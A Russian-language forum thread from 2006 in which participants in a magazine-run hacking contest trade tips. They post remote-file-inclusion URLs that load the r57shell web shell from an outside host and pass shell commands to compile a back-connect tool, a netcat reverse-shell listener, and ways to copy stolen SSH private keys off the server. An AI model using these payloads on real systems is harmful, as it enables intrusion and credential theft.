НОВЫЙ Конкурс взлома. март 2006
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 10:46:53
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
quote:
—————-<BR>Цитата: Дата:18.03.2006 19:40:57, Автор:TheFeaR ::
на gcc ьам прав не хватает но по-моему там есть много других компилеров c разрешениями для nobody! загляните в /usr/bin
—————-
Но если прав не хватает то все равно он должен отзываться на команду which. Кто му же war_driver говорит что все работало пучком…
Может его удалили? Вчера кто-то шелл еще удалил…
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 12:11:35
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
ну и Х с ним с этим шэлом запусти так
http://konkurs.xakep.ru/index.php?lang=http://rst.void.ru/download/r57shell
а вообще ИМХО было бы намного интереснее если бы конкурс основывался на некоторых статьях из форума или из журнала.
Например в этом месяце вышел бы журнал со статьей по php including.Тогда бы конкурс был бы интереснее..А так половина народу вообще на знает даже как шел запустить.
Еще раз повторю это ИМХО
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 12:33:34
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
Толи я м**ак, толи лыжи не едут… Ключи то слил, но на сколько я понимаю должен быть открыт ssh, но он закрыт, это так задумано или нет?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 14:11:10
|
|
|
glukreal
Сообщений: 61
Оценки: 0
Присоединился: 2006-03-18 09:27:09
|
Блин всё надоело gcc есть на сервере лежит в /usr/local/bin называется gcc40 так как версия обновлялась… Только почему-то бэк коннект не работает мож я чё не правильно делаю??
На соём компе nc -l -p 4000
На сервере ./bdw xx.xx.xx.xx 4000 но коннект не идёт!!![sm=mad.gif][sm=aah.gif]
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 14:31:50
|
|
|
glukreal
Сообщений: 61
Оценки: 0
Присоединился: 2006-03-18 09:27:09
|
Кстати а может используется перевод openssh с 22 порта на IRQ4 girlsblackhat.net??? А может я ерунду сморозил, просто как вариант… Мне это ни чего не даёт, я не пользуюсь IRQ но если кому то поможет надеюсь на взаимопомощь [sm=1.gif][sm=1.gif][sm=1.gif]
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 15:35:45
|
|
|
NeuRonix
Сообщений: 26
Оценки: 0
Присоединился: 2006-03-12 13:19:03
|
Надо просто ./bdw xx.xx.xx.xx не надо указывать порт
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 17:44:25
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
Мля какой-то **** постоянно /tmp чистит… Не могу скомпилить bdw.c !!! как вы его собираете?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 17:59:54
|
|
|
irq4
Сообщений: 5
Оценки: 0
Присоединился: 2006-02-23 19:55:12
|
xkeeper: верно мыслишь.
только теперь там правда какие-то глюки с ssh. я тоже не могу зайти.
видать кто-то намудачил.
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:09:32
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
а ключики у меня чото не сливаются [sm=zhaba.gif]
их через шелл надо качать?
Updated:
сори [sm=sm128.gif] ступил [sm=sm128.gif]
все пучком
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:28:57
|
|
|
NeuRonix
Сообщений: 26
Оценки: 0
Присоединился: 2006-03-12 13:19:03
|
Ключики надо сливать например на народ.ру, а можно просто в r57shell редактировать ключик, его можно тока просмотреть, берешь просто копируешь все это дело создаешь у себя на компе файлик id_rsa вставляешь и сохраняешь вот тока че действительно с sshl намудрили или глюк у них или решили усложнить нам конкурс.
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:43:14
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Да… интерестно все это. Вот только куда теперь пропал еще и CC и почему уже откомпайленый на ЭТОМ серве bdw уже не запускаеться?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:56:17
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
Наорд даю подсказку чтобы больше не кто об этом не спрашивал, ато все уши прожужали, нытики,
компилить надо так:
/usr/local/bin.gcc40 /tmp/cbd.c -o /tmp/cbd
все!
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 18:58:12
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
Подцепиться к SSH не удается, но должен ли он так просто принимать любые коннекты?
Может стоит что-нить вроде фрауд защиты? Хотя в конфиге демона я ничего не нашел по этому поводу…
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:02:25
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
Народ даю подсказку чтобы больше не кто об этом не спрашивал, а то все уши прожужали, нытики,
компилить надо так:
/usr/local/bin/gcc40 /tmp/cbd.c -o /tmp/cbd
все!
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:05:51
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
http://konkurs.xakep.ru/index.php?lang=http://jjj11123.narod.ru/bad&cmd=/usr/local/bin.gcc40 /tmp/bdw.c -o /tmp/bdw;cd /tmp;ls -la;
Вот такой запрос! И СЕЙЧАС не пашет! Я не знаю че там намудрили. До этого вообще компилил так
http://konkurs.xakep.ru/index.php?lang=http://jjj11123.narod.ru/bad&cmd=cd /tmp;cc bdw.c -o bdw;ls -la;
Ща вообще сервак убитый. Испортили нах! Заново давайте! [sm=1.gif]
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:11:34
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
У тебя скрипт кривой видиш он ругается
/tmp/bdw.c: In function 'main':<BR>/tmp/bdw.c:72: error: parse error before '{' token<BR>/tmp/bdw.c: At top level:<BR>/tmp/bdw.c:86: error: parse error before '}' token<BR>/tmp/bdw.c:87: warning: parameter names (without types) in function declaration<BR>/tmp/bdw.c:87: warning: data definition has no type or storage class<BR>/tmp/bdw.c:88: error: parse error before '}' token<BR>/tmp/bdw.c:88:2: warning: no newline at end of file
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:12:04
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
Какой авдотий подчистил /tmp???
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:13:27
|
|
|
SiruS
Сообщений: 34
Оценки: 0
Присоединился: 2005-11-14 18:48:16
|
скачай
cbd.c
его и компили
у мя все окей
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:16:30
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Как он может быть кривым, если я им пользовался весь день?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:18:31
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Извеняюсь, действительно скрипт подпортил. bdw заработал
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:21:02
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
Откомпилил…. Только не запускаеться. попробуйте /tmp/bdw
пишу ./bdw [ip] и нефига…. а ведь работало! и ключи даже спер
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 19:39:53
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
Вобщем ж*па господа, кто то закрыл 22 порт, будем ждать пока исправят
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 20:22:21
|
|
|
.:[ksuri]:.
Сообщений: 216
Оценки: 0
Присоединился: 2005-04-17 23:52:52
|
quote:
—————-<BR>Цитата: Дата:19.03.2006 19:39:53, Автор:Xkeeper ::
Вобщем ж*па господа, кто то закрыл 22 порт, будем ждать пока исправят
—————-
Порт открыт, просто демон сразу разрывает коннект [sm=5.gif]
У меня это происходит при начале обмена ключами.
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 20:59:25
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
у меня тож, только что теперь делать?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:22:27
|
|
|
irq4
Сообщений: 5
Оценки: 0
Присоединился: 2006-02-23 19:55:12
|
Какой-то мудак досит ssh
ждем
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:28:01
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
народ может я чего-то недогоняю но вот настройки sshd и авторизация по rsa закомментированна
# $OpenBSD: sshd_config,v 1.68 2003/12/29 16:39:50 millert Exp $
# $FreeBSD: src/crypto/openssh/sshd_config,v 1.40 2004/04/20 09:37:29 des Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options change a
# default value.
# Note that some of FreeBSD's defaults differ from OpenBSD's, and
# FreeBSD has a few additional options.
#VersionAddendum FreeBSD-20040419
Port 22
Protocol 2
ListenAddress 81.177.29.6
#ListenAddress ::
# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
#HostKey /etc/ssh/ssh_host_dsa_key
# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 768
# Logging
#obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#RSAAuthentication yes
#PubkeyAuthentication yes
#AuthorizedKeysFile .ssh/authorized_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#RhostsRSAAuthentication no
# similar for protocol version 2
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# Change to yes to enable built-in password authentication.
#PasswordAuthentication no
#PermitEmptyPasswords no
# Change to no to disable PAM authentication
#ChallengeResponseAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
# Set this to 'no' to disable PAM authentication (via challenge-response)
# and session processing.
#UsePAM yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#UsePrivilegeSeparation yes
#PermitUserEnvironment no
#Compression yes
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS yes
#PidFile /var/run/sshd.pid
#MaxStartups 10
# no default banner path
#Banner /some/path
# override default of no subsystems
Subsystem sftp /usr/libexec/sftp-server
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:28:25
|
|
|
Хakеp
Сообщений: 58
Оценки: 0
Присоединился: 2005-12-05 23:38:31
|
Надо найти и убить эту сволочь!!!![sm=11.gif][sm=mad.gif]
Вот интересно когда порт откроют в се повалятся к нему конектица и опять получится типв дос??? [sm=1.gif][sm=3.gif][sm=4.gif][sm=2.gif]
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:37:38
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
Хых, у меня даже до обмена ключами не доходит, сразу рефузит.
Я вот думаю, может какой то олень брутит пасс? ))
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:42:07
|
|
|
irq4
Сообщений: 5
Оценки: 0
Присоединился: 2006-02-23 19:55:12
|
тоже возможно
вообще, не понимаю. зачем западло другим делать, особенно если сам не можешь пройти?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:47:55
|
|
|
Хakеp
Сообщений: 58
Оценки: 0
Присоединился: 2005-12-05 23:38:31
|
Он просто пока думает! Как пройти конкурс!! Щас дочитает журнал хакер перестанет досить шел и вытерет нам всем нос!!![sm=3.gif]
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 21:57:58
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
Блин это уже не конкурс на сообразительность а на ловкость=)) ща все повалят записываться в winner.txt потом найдется сволочь которая его сотрет и потом опять создаст и так как говорится while (1) =)
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:10:57
|
|
|
Хakеp
Сообщений: 58
Оценки: 0
Присоединился: 2005-12-05 23:38:31
|
Нефига для этого надо иметь права рута!!!
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:14:28
|
|
|
Xkeeper
Сообщений: 39
Оценки: 0
Присоединился: 2004-12-09 17:21:25
|
так а там насколько я видел суидный файлик лежит в директории юзера от которого ключи слили, и права у него как раз на группу konkurs, тобиш вероятно там суидный шелл, хотя хз.
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:33:14
|
|
|
webserge
Сообщений: 7
Оценки: 0
Присоединился: 2006-03-19 22:27:21
|
А почему ps -aux не отображает sshd и sockstat -4l не показывает что 22 порт открыт??? Точно sshd запущен?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:52:04
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
кстати а из putty с ключем нельзя подключиться????
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:55:05
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
можно, только вот куда, если ssh на 22 порту не пашет
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 22:59:57
|
|
|
TheFeaR
Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
|
Это понятно что ssh не запущен…Мне просто интересно куда пихать в путти этот ключь?
в ssh->Auth ?
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 23:17:57
|
|
|
LoFFi
Сообщений: 12
Оценки: 0
Присоединился: 2006-03-19 11:21:15
|
да
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-19 23:23:04
|
|
|
fostr
Сообщений: 55
Оценки: 0
Присоединился: 2006-02-23 20:37:32
|
да я гляжу тут не только 5 победителей будет.
как только прошел - сразу стучать мне в асю
|
|
|
|
|
НОВЫЙ Конкурс взлома. март 2006 - 2006-03-20 08:03:09
|
|
|
glukreal
Сообщений: 61
Оценки: 0
Присоединился: 2006-03-18 09:27:09
|
БЛИН поделитесь ключиком, а то я не слил или скажите от куда его слить моно!!!
|
|
|
|
|
|
